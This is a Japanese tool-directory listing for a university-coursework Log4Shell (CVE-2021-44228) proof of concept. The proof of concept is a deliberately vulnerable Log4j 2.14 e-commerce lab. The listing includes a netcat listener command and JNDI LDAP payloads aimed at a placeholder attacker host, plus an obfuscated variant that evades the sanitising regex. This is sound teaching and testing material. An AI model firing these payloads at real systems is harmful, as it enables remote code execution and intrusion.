Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
TPASLog4ShellPoC — FCUPの情報セキュリティ修士課程におけるカリキュラムユニットTPASのコースワークとして開発された、Log4Shell脆弱性(CVE-2021-44228)の概念実証。 | Kitploit
ツール/GitHubGitHub/carlos-mesquita/tpaslog4shellpoc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用WAFバイパス学習と教育Archived
GitHubcarlos-mesquita/tpaslog4shellpoc

TPASLog4ShellPoC

FCUPの情報セキュリティ修士課程におけるカリキュラムユニットTPASのコースワークとして開発された、Log4Shell脆弱性(CVE-2021-44228)の概念実証。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

TPAS Log4Shell PoC

このリポジトリは、Log4Shell脆弱性(CVE-2021-44228)の概念実証(PoC)を含んでいます。これは、FCUPの情報セキュリティ修士課程におけるカリキュラム科目TPASの課題の一部として開発されました。

特徴:

  • React SPAフロントエンド:ダミーJSON API https://dummyjson.com/docs/products を介して提供される、商品の閲覧や説明、価格、評価などの基本詳細を表示するような基本的な機能を備えた汎用eコマースウェブサイトをシミュレートします。
  • 脆弱なバージョンのLog4j 2.14を使用するSpring Boot REST APIバックエンド。
  • Log4Shellを悪用するために必要な攻撃者側のほとんどの設定を行うbashスクリプト。

このスタックを実行するには、以下が必要です:

  • ターゲットホスト上:
    • Dockerをインストールする
    • docker-compose.yamlのNEXT_PUBLIC_BACKEND_URL環境変数内の<target_ip>を置き換える
    • docker-compose upを実行する
  • 攻撃者ホスト上:
    • Java、Python、Mavenをインストールする
    • 必要なポートを開く("./init.sh --help"でポートとスクリプトの動作を確認)
    • スクリプトinit.shを実行する
    • netcatリスナーを実行する(nc -lvnp )

すべてが実行されたら:

このペイロードを検索バーに配置します(GETクエリパラメータになるためURLエンコード):

root@kitploit:~
%24%7Bjndi%3Aldap%3A%2F%2F<attacker_host_ip>%3A<ldap_port>%2FExploit%7D

または、リクエストのヘッダーにこのペイロードを配置します(Burp Suiteを使用してリクエストをインターセプトし、改変できます):

root@kitploit:~
${jndi:ldap://<attacker_host_ip>:<ldap_port>/Exploit}

ウェブサイトでは、ユーザー名の横にアイコンがあり、正規表現 \$\{jndi:.*?} を使用してログ文字列をサニタイズするかどうかを切り替えることができます。デフォルトではサニタイズは無効で、赤い悪魔のアイコンで表されます。サニタイズが有効になると、アイコンは緑色のスマイリーフェイスに変わります。

この機能はWAFバイパスをシミュレートする方法として使用できます。バックエンドのLoggerManager.javaクラスにさらに正規表現を追加できます。

現在の正規表現ではマッチしないペイロードは次のとおりです:

root@kitploit:~
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://<attacker_host_ip>:<ldap_port>/Exploit}
ツールをダウンロード